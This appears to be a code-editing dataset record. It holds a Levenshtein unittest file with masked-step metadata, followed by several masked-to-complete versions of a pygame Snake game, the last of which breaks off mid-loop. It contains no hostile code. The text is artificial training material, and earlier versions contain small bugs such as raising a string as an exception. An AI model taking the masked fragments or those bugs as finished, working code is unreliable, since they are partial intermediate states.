setattr(Tests, 'test_{}_{}'.format(name, lev_fn.__name__), test_fn)
if __name__ == '__main__':
unittest.main()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
TEST_DATA = [('classic', 'kitten', 'sitting', 3), ('same', 'kitten',
'kitten', 0), ('empty', '', '', 0), ('a', 'meilenstein', 'levenshtein',
4), ('b', 'levenshtein', 'frankenstein', 6), ('c', 'confide', 'deceit',
6), ('d', 'CUNsperrICY', 'conspiracy', 8)]
TEST_FUNCTIONS = [Levenshtein().recursive, Levenshtein().wf, Levenshtein().
wfi, Levenshtein().damerau]
class Tests(unittest.TestCase):
def test_singleton(self):
lev1, lev2 = Levenshtein(), Levenshtein()
self.assertIs(lev1, lev2)
def _mk_test_fn(fn, a, b, expected):
def _test_fn(self):
self.assertEqual(fn(a, b), expected)
self.assertEqual(fn(b, a), expected)
return _test_fn
for lev_fn, data in itertools.product(TEST_FUNCTIONS, TEST_DATA):
name, a, b, expected = data
test_fn = _mk_test_fn(lev_fn, a, b, expected)
setattr(Tests, 'test_{}_{}'.format(name, lev_fn.__name__), test_fn)
if __name__ == '__main__':
unittest.main()
<|reserved_special_token_1|>
import itertools
import unittest
from pylev3 import Levenshtein
TEST_DATA = [
('classic', "kitten", "sitting", 3),
('same', "kitten", "kitten", 0),
('empty', "", "", 0),
('a', "meilenstein", "levenshtein", 4),
('b', "levenshtein", "frankenstein", 6),
('c', "confide", "deceit", 6),
('d', "CUNsperrICY", "conspiracy", 8),
]
TEST_FUNCTIONS = [
# Levenshtein().classic, # too slow
Levenshtein().recursive,
Levenshtein().wf,
Levenshtein().wfi,
Levenshtein().damerau
]
class Tests(unittest.TestCase):
def test_singleton(self):
lev1, lev2 = Levenshtein(), Levenshtein()
self.assertIs(lev1, lev2)
def _mk_test_fn(fn, a, b, expected):
def _test_fn(self):
self.assertEqual(fn(a, b), expected)
self.assertEqual(fn(b, a), expected)
return _test_fn
for lev_fn, data in itertools.product(TEST_FUNCTIONS, TEST_DATA):
name, a, b, expected = data
test_fn = _mk_test_fn(lev_fn, a, b, expected)
setattr(Tests, "test_{}_{}".format(name, lev_fn.__name__), test_fn)
if __name__ == '__main__':
unittest.main()
|
flexible
|
{
"blob_id": "892d6662e4276f96797c9654d15c96a608d0835a",
"index": 8927,
"step-1": "<mask token>\n\n\nclass Tests(unittest.TestCase):\n\n def test_singleton(self):\n lev1, lev2 = Levenshtein(), Levenshtein()\n self.assertIs(lev1, lev2)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Tests(unittest.TestCase):\n\n def test_singleton(self):\n lev1, lev2 = Levenshtein(), Levenshtein()\n self.assertIs(lev1, lev2)\n\n\ndef _mk_test_fn(fn, a, b, expected):\n\n def _test_fn(self):\n self.assertEqual(fn(a, b), expected)\n self.assertEqual(fn(b, a), expected)\n return _test_fn\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Tests(unittest.TestCase):\n\n def test_singleton(self):\n lev1, lev2 = Levenshtein(), Levenshtein()\n self.assertIs(lev1, lev2)\n\n\ndef _mk_test_fn(fn, a, b, expected):\n\n def _test_fn(self):\n self.assertEqual(fn(a, b), expected)\n self.assertEqual(fn(b, a), expected)\n return _test_fn\n\n\nfor lev_fn, data in itertools.product(TEST_FUNCTIONS, TEST_DATA):\n name, a, b, expected = data\n test_fn = _mk_test_fn(lev_fn, a, b, expected)\n setattr(Tests, 'test_{}_{}'.format(name, lev_fn.__name__), test_fn)\nif __name__ == '__main__':\n unittest.main()\n",
"step-4": "<mask token>\nTEST_DATA = [('classic', 'kitten', 'sitting', 3), ('same', 'kitten',\n 'kitten', 0), ('empty', '', '', 0), ('a', 'meilenstein', 'levenshtein',\n 4), ('b', 'levenshtein', 'frankenstein', 6), ('c', 'confide', 'deceit',\n 6), ('d', 'CUNsperrICY', 'conspiracy', 8)]\nTEST_FUNCTIONS = [Levenshtein().recursive, Levenshtein().wf, Levenshtein().\n wfi, Levenshtein().damerau]\n\n\nclass Tests(unittest.TestCase):\n\n def test_singleton(self):\n lev1, lev2 = Levenshtein(), Levenshtein()\n self.assertIs(lev1, lev2)\n\n\ndef _mk_test_fn(fn, a, b, expected):\n\n def _test_fn(self):\n self.assertEqual(fn(a, b), expected)\n self.assertEqual(fn(b, a), expected)\n return _test_fn\n\n\nfor lev_fn, data in itertools.product(TEST_FUNCTIONS, TEST_DATA):\n name, a, b, expected = data\n test_fn = _mk_test_fn(lev_fn, a, b, expected)\n setattr(Tests, 'test_{}_{}'.format(name, lev_fn.__name__), test_fn)\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "import itertools\nimport unittest\n\nfrom pylev3 import Levenshtein\n\n\nTEST_DATA = [\n ('classic', \"kitten\", \"sitting\", 3),\n ('same', \"kitten\", \"kitten\", 0),\n ('empty', \"\", \"\", 0),\n ('a', \"meilenstein\", \"levenshtein\", 4),\n ('b', \"levenshtein\", \"frankenstein\", 6),\n ('c', \"confide\", \"deceit\", 6),\n ('d', \"CUNsperrICY\", \"conspiracy\", 8),\n]\n\nTEST_FUNCTIONS = [\n # Levenshtein().classic, # too slow\n Levenshtein().recursive,\n Levenshtein().wf,\n Levenshtein().wfi,\n Levenshtein().damerau\n]\n\n\nclass Tests(unittest.TestCase):\n def test_singleton(self):\n lev1, lev2 = Levenshtein(), Levenshtein()\n self.assertIs(lev1, lev2)\n\n\ndef _mk_test_fn(fn, a, b, expected):\n def _test_fn(self):\n self.assertEqual(fn(a, b), expected)\n self.assertEqual(fn(b, a), expected)\n return _test_fn\n\n\nfor lev_fn, data in itertools.product(TEST_FUNCTIONS, TEST_DATA):\n name, a, b, expected = data\n test_fn = _mk_test_fn(lev_fn, a, b, expected)\n setattr(Tests, \"test_{}_{}\".format(name, lev_fn.__name__), test_fn)\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-ids": [
2,
3,
4,
5,
7
]
}
|
[
2,
3,
4,
5,
7
] |
<|reserved_special_token_0|>
class Food:
<|reserved_special_token_0|>
def draw(self):
seq = [self.food1, self.food2]
self.parent_screen.blit(random.choice(seq), (self.food_x, self.food_y))
pygame.display.flip()
def move(self):
self.food_x = random.randint(0, W // SIZE - 1) * SIZE
self.food_y = random.randint(0, H // SIZE - 1) * SIZE
class Game:
def __init__(self):
pygame.init()
pygame.display.set_caption('Snake Game')
self.surface = pygame.display.set_mode(SCREEN)
self.surface.fill(BACKGROUND)
self.snake = Snake(self.surface, 3)
self.snake.draw()
self.food = Food(self.surface)
self.food.draw()
pygame.mixer.init()
self.background_music()
def is_collision(self, x1, y1, x2, y2):
if x1 >= x2 and x1 < x2 + SIZE:
if y1 >= y2 and y1 < y2 + SIZE:
return True
else:
return False
def play_sound(self, sound_location):
sound = pygame.mixer.Sound(sound_location)
pygame.mixer.Sound.play(sound)
def background_music(self):
pygame.mixer.music.load('resources/b_music1.mp3')
pygame.mixer.music.play(-1)
def render_background(self):
bg = pygame.image.load('resources/background.jpg')
self.surface.blit(bg, (0, 0))
def play(self):
self.render_background()
self.snake.move()
self.food.draw()
self.display_score()
self.screen_msgs()
pygame.display.flip()
if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[0],
self.food.food_x, self.food.food_y):
self.food.move()
self.snake.increase_length()
self.play_sound('resources/ding.mp3')
for i in range(2, self.snake.length):
if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[
0], self.snake.snake_x[i], self.snake.snake_y[i]):
self.play_sound('resources/fail_buzz.mp3')
raise 'Game Over'
self.touch_border_action()
def pause_msg(self):
font = pygame.font.SysFont('arial', 20)
font1 = pygame.font.SysFont('Rockwell', 80)
line1 = font1.render(f'<Paused>', True, (200, 200, 200))
line2 = font.render(f'Press <UP, DOWN, LEFT, RIGHT> To Resume',
True, (255, 255, 0))
self.surface.blit(line1, (W // 4 + 20, H // 3))
self.surface.blit(line2, (W // 4 + 30, H // 3 + 100))
pygame.display.flip()
def show_game_over(self):
self.render_background()
font = pygame.font.SysFont('Cooper Black', 30)
font1 = pygame.font.SysFont('Cooper Black', 60)
line1 = font1.render(f'GAME OVER !!', True, (200, 0, 0))
line1B = font.render(f'<<Score : {self.snake.length - 3}>>', True,
(10, 255, 10))
line2 = font.render(f'Press <UP, DOWN, LEFT, RIGHT> To Play Again',
True, (200, 200, 200))
line3 = font.render(f'Press ESC to EXIT!', True, (255, 200, 0))
self.surface.blit(line1, (W // 4 - 25, H // 3 - 45))
self.surface.blit(line1B, (W // 4 + 100, H // 3 + 60))
self.surface.blit(line2, (45, H // 3 + 110))
self.surface.blit(line3, (W // 4 + 50, H // 3 + 160))
pygame.display.flip()
pygame.mixer.music.rewind()
pygame.mixer.music.pause()
def touch_border_action(self):
if self.snake.snake_x[0] == W:
self.snake.snake_x[0] = 0
elif self.snake.snake_x[0] < 0:
self.snake.snake_x[0] = W
if self.snake.snake_y[0] == H:
self.snake.snake_y[0] = 0
elif self.snake.snake_y[0] < 0:
self.snake.snake_y[0] = H
def reset_game(self):
self.snake = Snake(self.surface, 3)
self.food = Food(self.surface)
def display_score(self):
font = pygame.font.SysFont('Algerian', 30)
score = font.render(f'[Score : {self.snake.length - 3}]', True, (0,
255, 255))
self.surface.blit(score, (W // 2 - 70, 5))
def screen_msgs(self):
font = pygame.font.SysFont('aharoni', 16)
msgs1 = font.render('[SPACE] to Pause', True, (200, 204, 255))
msgs2 = font.render('[ESC] to EXIT', True, (200, 204, 255))
self.surface.blit(msgs1, (W - 100, H - 20))
self.surface.blit(msgs2, (10, H - 20))
def run(self):
clock = pygame.time.Clock()
running = True
pause_game = False
while running:
for event in pygame.event.get():
if event.type == KEYDOWN:
if event.key == K_ESCAPE:
running = False
if event.key == K_SPACE:
pygame.mixer.music.pause()
self.pause_msg()
pause_game = True
if event.key == K_UP:
self.snake.move_up()
pause_game = False
pygame.mixer.music.unpause()
if event.key == K_DOWN:
self.snake.move_down()
pause_game = False
pygame.mixer.music.unpause()
if event.key == K_LEFT:
self.snake.move_left()
pause_game = False
pygame.mixer.music.unpause()
if event.key == K_RIGHT:
self.snake.move_right()
pause_game = False
pygame.mixer.music.unpause()
elif event.type == QUIT:
running = False
if not pause_game:
try:
self.play()
except Exception as e:
self.show_game_over()
pause_game = True
self.reset_game()
clock.tick(60)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Snake:
def __init__(self, parent_screen, length):
self.parent_screen = parent_screen
self.length = length
self.snake = pygame.image.load('resources/snake.png').convert()
self.snake_x = [W // 2] * length
self.snake_y = [H // 2] * length
self.direction = 'left'
<|reserved_special_token_0|>
def draw(self):
for i in range(self.length):
self.parent_screen.blit(self.snake, (self.snake_x[i], self.
snake_y[i]))
pygame.display.flip()
def move(self):
for i in range(self.length - 1, 0, -1):
self.snake_x[i] = self.snake_x[i - 1]
self.snake_y[i] = self.snake_y[i - 1]
if self.direction == 'up':
self.snake_y[0] -= SIZE
if self.direction == 'down':
self.snake_y[0] += SIZE
if self.direction == 'right':
self.snake_x[0] += SIZE
if self.direction == 'left':
self.snake_x[0] -= SIZE
self.draw()
def move_up(self):
self.direction = 'up'
def move_down(self):
self.direction = 'down'
def move_right(self):
self.direction = 'right'
def move_left(self):
self.direction = 'left'
class Food:
def __init__(self, parent_screen):
self.parent_screen = parent_screen
self.food1 = pygame.image.load('resources/food.png').convert()
self.food2 = pygame.image.load('resources/snake1.png').convert()
self.food_x = SIZE * 3
self.food_y = SIZE * 2
def draw(self):
seq = [self.food1, self.food2]
self.parent_screen.blit(random.choice(seq), (self.food_x, self.food_y))
pygame.display.flip()
def move(self):
self.food_x = random.randint(0, W // SIZE - 1) * SIZE
self.food_y = random.randint(0, H // SIZE - 1) * SIZE
class Game:
def __init__(self):
pygame.init()
pygame.display.set_caption('Snake Game')
self.surface = pygame.display.set_mode(SCREEN)
self.surface.fill(BACKGROUND)
self.snake = Snake(self.surface, 3)
self.snake.draw()
self.food = Food(self.surface)
self.food.draw()
pygame.mixer.init()
self.background_music()
def is_collision(self, x1, y1, x2, y2):
if x1 >= x2 and x1 < x2 + SIZE:
if y1 >= y2 and y1 < y2 + SIZE:
return True
else:
return False
def play_sound(self, sound_location):
sound = pygame.mixer.Sound(sound_location)
pygame.mixer.Sound.play(sound)
def background_music(self):
pygame.mixer.music.load('resources/b_music1.mp3')
pygame.mixer.music.play(-1)
def render_background(self):
bg = pygame.image.load('resources/background.jpg')
self.surface.blit(bg, (0, 0))
def play(self):
self.render_background()
self.snake.move()
self.food.draw()
self.display_score()
self.screen_msgs()
pygame.display.flip()
if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[0],
self.food.food_x, self.food.food_y):
self.food.move()
self.snake.increase_length()
self.play_sound('resources/ding.mp3')
for i in range(2, self.snake.length):
if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[
0], self.snake.snake_x[i], self.snake.snake_y[i]):
self.play_sound('resources/fail_buzz.mp3')
raise 'Game Over'
self.touch_border_action()
def pause_msg(self):
font = pygame.font.SysFont('arial', 20)
font1 = pygame.font.SysFont('Rockwell', 80)
line1 = font1.render(f'<Paused>', True, (200, 200, 200))
line2 = font.render(f'Press <UP, DOWN, LEFT, RIGHT> To Resume',
True, (255, 255, 0))
self.surface.blit(line1, (W // 4 + 20, H // 3))
self.surface.blit(line2, (W // 4 + 30, H // 3 + 100))
pygame.display.flip()
def show_game_over(self):
self.render_background()
font = pygame.font.SysFont('Cooper Black', 30)
font1 = pygame.font.SysFont('Cooper Black', 60)
line1 = font1.render(f'GAME OVER !!', True, (200, 0, 0))
line1B = font.render(f'<<Score : {self.snake.length - 3}>>', True,
(10, 255, 10))
line2 = font.render(f'Press <UP, DOWN, LEFT, RIGHT> To Play Again',
True, (200, 200, 200))
line3 = font.render(f'Press ESC to EXIT!', True, (255, 200, 0))
self.surface.blit(line1, (W // 4 - 25, H // 3 - 45))
self.surface.blit(line1B, (W // 4 + 100, H // 3 + 60))
self.surface.blit(line2, (45, H // 3 + 110))
self.surface.blit(line3, (W // 4 + 50, H // 3 + 160))
pygame.display.flip()
pygame.mixer.music.rewind()
pygame.mixer.music.pause()
def touch_border_action(self):
if self.snake.snake_x[0] == W:
self.snake.snake_x[0] = 0
elif self.snake.snake_x[0] < 0:
self.snake.snake_x[0] = W
if self.snake.snake_y[0] == H:
self.snake.snake_y[0] = 0
elif self.snake.snake_y[0] < 0:
self.snake.snake_y[0] = H
def reset_game(self):
self.snake = Snake(self.surface, 3)
self.food = Food(self.surface)
def display_score(self):
font = pygame.font.SysFont('Algerian', 30)
score = font.render(f'[Score : {self.snake.length - 3}]', True, (0,
255, 255))
self.surface.blit(score, (W // 2 - 70, 5))
def screen_msgs(self):
font = pygame.font.SysFont('aharoni', 16)
msgs1 = font.render('[SPACE] to Pause', True, (200, 204, 255))
msgs2 = font.render('[ESC] to EXIT', True, (200, 204, 255))
self.surface.blit(msgs1, (W - 100, H - 20))
self.surface.blit(msgs2, (10, H - 20))
def run(self):
clock = pygame.time.Clock()
running = True
pause_game = False
while running:
for event in pygame.event.get():
if event.type == KEYDOWN:
if event.key == K_ESCAPE:
running = False
if event.key == K_SPACE:
pygame.mixer.music.pause()
self.pause_msg()
pause_game = True
if event.key == K_UP:
self.snake.move_up()
pause_game = False
pygame.mixer.music.unpause()
if event.key == K_DOWN:
self.snake.move_down()
pause_game = False
pygame.mixer.music.unpause()
if event.key == K_LEFT:
self.snake.move_left()
pause_game = False
pygame.mixer.music.unpause()
if event.key == K_RIGHT:
self.snake.move_right()
pause_game = False
pygame.mixer.music.unpause()
elif event.type == QUIT:
running = False
if not pause_game:
try:
self.play()
except Exception as e:
self.show_game_over()
pause_game = True
self.reset_game()
clock.tick(60)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
SIZE = 20
BACKGROUND = 45, 34, 44
W = 800
H = 400
SCREEN = W, H
class Snake:
def __init__(self, parent_screen, length):
self.parent_screen = parent_screen
self.length = length
self.snake = pygame.image.load('resources/snake.png').convert()
self.snake_x = [W // 2] * length
self.snake_y = [H // 2] * length
self.direction = 'left'
def increase_length(self):
self.length += 1
self.snake_x.append(0)
self.snake_y.append(0)
def draw(self):
for i in range(self.length):
self.parent_screen.blit(self.snake, (self.snake_x[i], self.
snake_y[i]))
pygame.display.flip()
def move(self):
for i in range(self.length - 1, 0, -1):
self.snake_x[i] = self.snake_x[i - 1]
self.snake_y[i] = self.snake_y[i - 1]
if self.direction == 'up':
self.snake_y[0] -= SIZE
if self.direction == 'down':
self.snake_y[0] += SIZE
if self.direction == 'right':
self.snake_x[0] += SIZE
if self.direction == 'left':
self.snake_x[0] -= SIZE
self.draw()
def move_up(self):
self.direction = 'up'
def move_down(self):
self.direction = 'down'
def move_right(self):
self.direction = 'right'
def move_left(self):
self.direction = 'left'
class Food:
def __init__(self, parent_screen):
self.parent_screen = parent_screen
self.food1 = pygame.image.load('resources/food.png').convert()
self.food2 = pygame.image.load('resources/snake1.png').convert()
self.food_x = SIZE * 3
self.food_y = SIZE * 2
def draw(self):
seq = [self.food1, self.food2]
self.parent_screen.blit(random.choice(seq), (self.food_x, self.food_y))
pygame.display.flip()
def move(self):
self.food_x = random.randint(0, W // SIZE - 1) * SIZE
self.food_y = random.randint(0, H // SIZE - 1) * SIZE
class Game:
def __init__(self):
pygame.init()
pygame.display.set_caption('Snake Game')
self.surface = pygame.display.set_mode(SCREEN)
self.surface.fill(BACKGROUND)
self.snake = Snake(self.surface, 3)
self.snake.draw()
self.food = Food(self.surface)
self.food.draw()
pygame.mixer.init()
self.background_music()
def is_collision(self, x1, y1, x2, y2):
if x1 >= x2 and x1 < x2 + SIZE:
if y1 >= y2 and y1 < y2 + SIZE:
return True
else:
return False
def play_sound(self, sound_location):
sound = pygame.mixer.Sound(sound_location)
pygame.mixer.Sound.play(sound)
def background_music(self):
pygame.mixer.music.load('resources/b_music1.mp3')
pygame.mixer.music.play(-1)
def render_background(self):
bg = pygame.image.load('resources/background.jpg')
self.surface.blit(bg, (0, 0))
def play(self):
self.render_background()
self.snake.move()
self.food.draw()
self.display_score()
self.screen_msgs()
pygame.display.flip()
if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[0],
self.food.food_x, self.food.food_y):
self.food.move()
self.snake.increase_length()
self.play_sound('resources/ding.mp3')
for i in range(2, self.snake.length):
if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[
0], self.snake.snake_x[i], self.snake.snake_y[i]):
self.play_sound('resources/fail_buzz.mp3')
raise 'Game Over'
self.touch_border_action()
def pause_msg(self):
font = pygame.font.SysFont('arial', 20)
font1 = pygame.font.SysFont('Rockwell', 80)
line1 = font1.render(f'<Paused>', True, (200, 200, 200))
line2 = font.render(f'Press <UP, DOWN, LEFT, RIGHT> To Resume',
True, (255, 255, 0))
self.surface.blit(line1, (W // 4 + 20, H // 3))
self.surface.blit(line2, (W // 4 + 30, H // 3 + 100))
pygame.display.flip()
def show_game_over(self):
self.render_background()
font = pygame.font.SysFont('Cooper Black', 30)
font1 = pygame.font.SysFont('Cooper Black', 60)
line1 = font1.render(f'GAME OVER !!', True, (200, 0, 0))
line1B = font.render(f'<<Score : {self.snake.length - 3}>>', True,
(10, 255, 10))
line2 = font.render(f'Press <UP, DOWN, LEFT, RIGHT> To Play Again',
True, (200, 200, 200))
line3 = font.render(f'Press ESC to EXIT!', True, (255, 200, 0))
self.surface.blit(line1, (W // 4 - 25, H // 3 - 45))
self.surface.blit(line1B, (W // 4 + 100, H // 3 + 60))
self.surface.blit(line2, (45, H // 3 + 110))
self.surface.blit(line3, (W // 4 + 50, H // 3 + 160))
pygame.display.flip()
pygame.mixer.music.rewind()
pygame.mixer.music.pause()
def touch_border_action(self):
if self.snake.snake_x[0] == W:
self.snake.snake_x[0] = 0
elif self.snake.snake_x[0] < 0:
self.snake.snake_x[0] = W
if self.snake.snake_y[0] == H:
self.snake.snake_y[0] = 0
elif self.snake.snake_y[0] < 0:
self.snake.snake_y[0] = H
def reset_game(self):
self.snake = Snake(self.surface, 3)
self.food = Food(self.surface)
def display_score(self):
font = pygame.font.SysFont('Algerian', 30)
score = font.render(f'[Score : {self.snake.length - 3}]', True, (0,
255, 255))
self.surface.blit(score, (W // 2 - 70, 5))
def screen_msgs(self):
font = pygame.font.SysFont('aharoni', 16)
msgs1 = font.render('[SPACE] to Pause', True, (200, 204, 255))
msgs2 = font.render('[ESC] to EXIT', True, (200, 204, 255))
self.surface.blit(msgs1, (W - 100, H - 20))
self.surface.blit(msgs2, (10, H - 20))
    def run(self):
        """Main loop: dispatch keyboard/window events, advance frames, and
        handle the pause and game-over states."""
        clock = pygame.time.Clock()
        running = True      # cleared by ESC or the window close button
        pause_game = False  # True while the pause / game-over screen shows
        while running:
            for event in pygame.event.get():
                if event.type == KEYDOWN:
                    if event.key == K_ESCAPE:
                        running = False
                    if event.key == K_SPACE:
                        pygame.mixer.music.pause()
                        self.pause_msg()
                        pause_game = True
                    # Any arrow key both steers the snake and resumes play.
                    if event.key == K_UP:
                        self.snake.move_up()
                        pause_game = False
                        pygame.mixer.music.unpause()
                    if event.key == K_DOWN:
                        self.snake.move_down()
                        pause_game = False
                        pygame.mixer.music.unpause()
                    if event.key == K_LEFT:
                        self.snake.move_left()
                        pause_game = False
                        pygame.mixer.music.unpause()
                    if event.key == K_RIGHT:
                        self.snake.move_right()
                        pause_game = False
                        pygame.mixer.music.unpause()
                elif event.type == QUIT:
                    running = False
            if not pause_game:
                try:
                    self.play()
                except Exception as e:
                    # play() raised on self-collision: show the game-over
                    # screen, pause, and reset state for the next round.
                    self.show_game_over()
                    pause_game = True
                    self.reset_game()
            clock.tick(60)  # cap the frame rate at 60 FPS
# Entry point: construct the game and hand control to its main loop.
if __name__ == '__main__':
    game = Game()
    game.run()
<|reserved_special_token_1|>
from typing import Sized
import pygame
import time
from pygame.locals import *
import random
# Gameplay constants: grid-cell size in pixels and the window geometry.
SIZE = 20
BACKGROUND = (45, 34, 44)  # RGB fill colour behind the playfield
W = 800
H = 400
SCREEN = (W, H)  # pygame display-mode size
class Snake:
    """The player's snake: parallel snake_x / snake_y lists hold the
    SIZE-aligned position of every segment, index 0 being the head."""

    def __init__(self, parent_screen, length):
        self.parent_screen = parent_screen
        self.length = length
        self.snake = pygame.image.load('resources/snake.png').convert()
        # Every segment starts stacked at the centre of the window.
        self.snake_x = [W // 2] * length
        self.snake_y = [H // 2] * length
        self.direction = 'left'  # initial travel direction

    def increase_length(self):
        """Grow by one segment; its (0, 0) placeholder position is
        overwritten on the very next move()."""
        self.length += 1
        self.snake_x.append(0)
        self.snake_y.append(0)

    def draw(self):
        """Blit every segment onto the parent surface and flip the display."""
        # snake_x/snake_y always hold exactly self.length entries.
        for seg_x, seg_y in zip(self.snake_x, self.snake_y):
            self.parent_screen.blit(self.snake, (seg_x, seg_y))
        pygame.display.flip()

    def move(self):
        """Advance one step: each body segment takes its predecessor's
        position, then the head moves one cell in the current direction."""
        # Walk back-to-front so positions shift without clobbering.
        for idx in range(self.length - 1, 0, -1):
            self.snake_x[idx] = self.snake_x[idx - 1]
            self.snake_y[idx] = self.snake_y[idx - 1]
        step_x, step_y = {
            'up': (0, -SIZE),
            'down': (0, SIZE),
            'right': (SIZE, 0),
            'left': (-SIZE, 0),
        }.get(self.direction, (0, 0))
        self.snake_x[0] += step_x
        self.snake_y[0] += step_y
        self.draw()

    def move_up(self):
        self.direction = 'up'

    def move_down(self):
        self.direction = 'down'

    def move_right(self):
        self.direction = 'right'

    def move_left(self):
        self.direction = 'left'
class Food:
    """A food item drawn at a random SIZE-aligned grid cell; eating it
    grows the snake."""

    def __init__(self, parent_screen):
        self.parent_screen = parent_screen
        # Two alternative sprites; draw() picks one at random each frame.
        self.food1 = pygame.image.load('resources/food.png').convert()
        self.food2 = pygame.image.load('resources/snake1.png').convert()
        self.food_x = SIZE * 3  # initial position
        self.food_y = SIZE * 2

    def draw(self):
        """Blit a randomly chosen food sprite and flip the display."""
        sprite = random.choice([self.food1, self.food2])
        self.parent_screen.blit(sprite, (self.food_x, self.food_y))
        pygame.display.flip()

    def move(self):
        """Teleport the food to a random cell on the SIZE grid."""
        self.food_x = random.randint(0, W // SIZE - 1) * SIZE
        self.food_y = random.randint(0, H // SIZE - 1) * SIZE
class Game:
    """Top-level game object: owns the pygame window, the snake, the food,
    the audio, and the main event loop."""

    def __init__(self):
        pygame.init()
        pygame.display.set_caption('Snake Game')
        self.surface = pygame.display.set_mode(SCREEN)
        self.surface.fill(BACKGROUND)
        self.snake = Snake(self.surface, 3)  # start with 3 segments
        self.snake.draw()
        self.food = Food(self.surface)
        self.food.draw()
        pygame.mixer.init()
        self.background_music()

    def is_collision(self, x1, y1, x2, y2):
        """Return True when point (x1, y1) lies inside the SIZE x SIZE cell
        anchored at (x2, y2).

        The original fell through and returned None (instead of False) when
        x1 was outside the cell; a single boolean expression always returns
        a proper bool.
        """
        return x2 <= x1 < x2 + SIZE and y2 <= y1 < y2 + SIZE

    def play_sound(self, sound_location):
        """Play a short one-shot sound effect from the given file path."""
        sound = pygame.mixer.Sound(sound_location)
        pygame.mixer.Sound.play(sound)

    def background_music(self):
        """Start the background track, looping forever (-1)."""
        pygame.mixer.music.load('resources/b_music1.mp3')
        pygame.mixer.music.play(-1)

    def render_background(self):
        """Paint the background image over the whole window."""
        bg = pygame.image.load('resources/background.jpg')
        self.surface.blit(bg, (0, 0))

    def play(self):
        """Advance the game by one frame: move and draw everything, then
        handle food and self-collisions.

        Raises:
            RuntimeError: on self-collision; run() catches this to show
                the game-over screen.
        """
        self.render_background()
        self.snake.move()
        self.food.draw()
        self.display_score()
        self.screen_msgs()
        pygame.display.flip()
        # Head over the food: relocate the food and grow the snake.
        if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[0],
                             self.food.food_x, self.food.food_y):
            self.food.move()
            self.snake.increase_length()
            self.play_sound('resources/ding.mp3')
        # Head over any body segment ends the game.  Segment 1 always trails
        # directly behind the head, so start checking at index 2.
        for i in range(2, self.snake.length):
            if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[0],
                                 self.snake.snake_x[i], self.snake.snake_y[i]):
                self.play_sound('resources/fail_buzz.mp3')
                # Raising a plain string is itself a TypeError in Python 3;
                # raise a real exception so the intent is explicit.
                raise RuntimeError('Game Over')
        self.touch_border_action()

    def pause_msg(self):
        """Overlay the pause banner and the resume hint."""
        font = pygame.font.SysFont('arial', 20)
        font1 = pygame.font.SysFont('Rockwell', 80)
        line1 = font1.render('<Paused>', True, (200, 200, 200))
        line2 = font.render('Press <UP, DOWN, LEFT, RIGHT> To Resume',
                            True, (255, 255, 0))
        self.surface.blit(line1, (W // 4 + 20, H // 3))
        self.surface.blit(line2, (W // 4 + 30, H // 3 + 100))
        pygame.display.flip()

    def show_game_over(self):
        """Draw the game-over screen with the final score and key hints,
        then stop the background music."""
        self.render_background()
        font = pygame.font.SysFont('Cooper Black', 30)
        font1 = pygame.font.SysFont('Cooper Black', 60)
        line1 = font1.render('GAME OVER !!', True, (200, 0, 0))
        line1B = font.render(f'<<Score : {self.snake.length - 3}>>', True,
                             (10, 255, 10))
        line2 = font.render('Press <UP, DOWN, LEFT, RIGHT> To Play Again',
                            True, (200, 200, 200))
        line3 = font.render('Press ESC to EXIT!', True, (255, 200, 0))
        self.surface.blit(line1, (W // 4 - 25, H // 3 - 45))
        self.surface.blit(line1B, (W // 4 + 100, H // 3 + 60))
        self.surface.blit(line2, (45, H // 3 + 110))
        self.surface.blit(line3, (W // 4 + 50, H // 3 + 160))
        pygame.display.flip()
        # Rewind so the music restarts from the top on the next round.
        pygame.mixer.music.rewind()
        pygame.mixer.music.pause()

    def touch_border_action(self):
        """Wrap the snake's head to the opposite edge when it leaves the
        window, so it re-enters instead of vanishing."""
        # >= / < instead of exact equality: the head still wraps even if it
        # ever overshoots the edge by more than one step.
        if self.snake.snake_x[0] >= W:
            self.snake.snake_x[0] = 0
        elif self.snake.snake_x[0] < 0:
            self.snake.snake_x[0] = W
        if self.snake.snake_y[0] >= H:
            self.snake.snake_y[0] = 0
        elif self.snake.snake_y[0] < 0:
            self.snake.snake_y[0] = H

    def reset_game(self):
        """Start a fresh round with a new snake and food."""
        self.snake = Snake(self.surface, 3)
        self.food = Food(self.surface)

    def display_score(self):
        """Render the current score (food eaten) near the top centre."""
        font = pygame.font.SysFont('Algerian', 30)
        score = font.render(f'[Score : {self.snake.length - 3}]', True,
                            (0, 255, 255))
        self.surface.blit(score, (W // 2 - 70, 5))

    def screen_msgs(self):
        """Show the pause/exit key hints along the bottom edge."""
        font = pygame.font.SysFont('aharoni', 16)
        msgs1 = font.render('[SPACE] to Pause', True, (200, 204, 255))
        msgs2 = font.render('[ESC] to EXIT', True, (200, 204, 255))
        self.surface.blit(msgs1, (W - 100, H - 20))
        self.surface.blit(msgs2, (10, H - 20))

    def run(self):
        """Main loop: dispatch keyboard/window events, advance frames at
        60 FPS, and handle the pause and game-over states."""
        clock = pygame.time.Clock()
        running = True      # cleared by ESC or the window close button
        pause_game = False  # True while the pause / game-over screen shows
        while running:
            for event in pygame.event.get():
                if event.type == KEYDOWN:
                    if event.key == K_ESCAPE:
                        running = False
                    if event.key == K_SPACE:
                        pygame.mixer.music.pause()
                        self.pause_msg()
                        pause_game = True
                    # Any arrow key both steers the snake and resumes play.
                    if event.key == K_UP:
                        self.snake.move_up()
                        pause_game = False
                        pygame.mixer.music.unpause()
                    if event.key == K_DOWN:
                        self.snake.move_down()
                        pause_game = False
                        pygame.mixer.music.unpause()
                    if event.key == K_LEFT:
                        self.snake.move_left()
                        pause_game = False
                        pygame.mixer.music.unpause()
                    if event.key == K_RIGHT:
                        self.snake.move_right()
                        pause_game = False
                        pygame.mixer.music.unpause()
                elif event.type == QUIT:
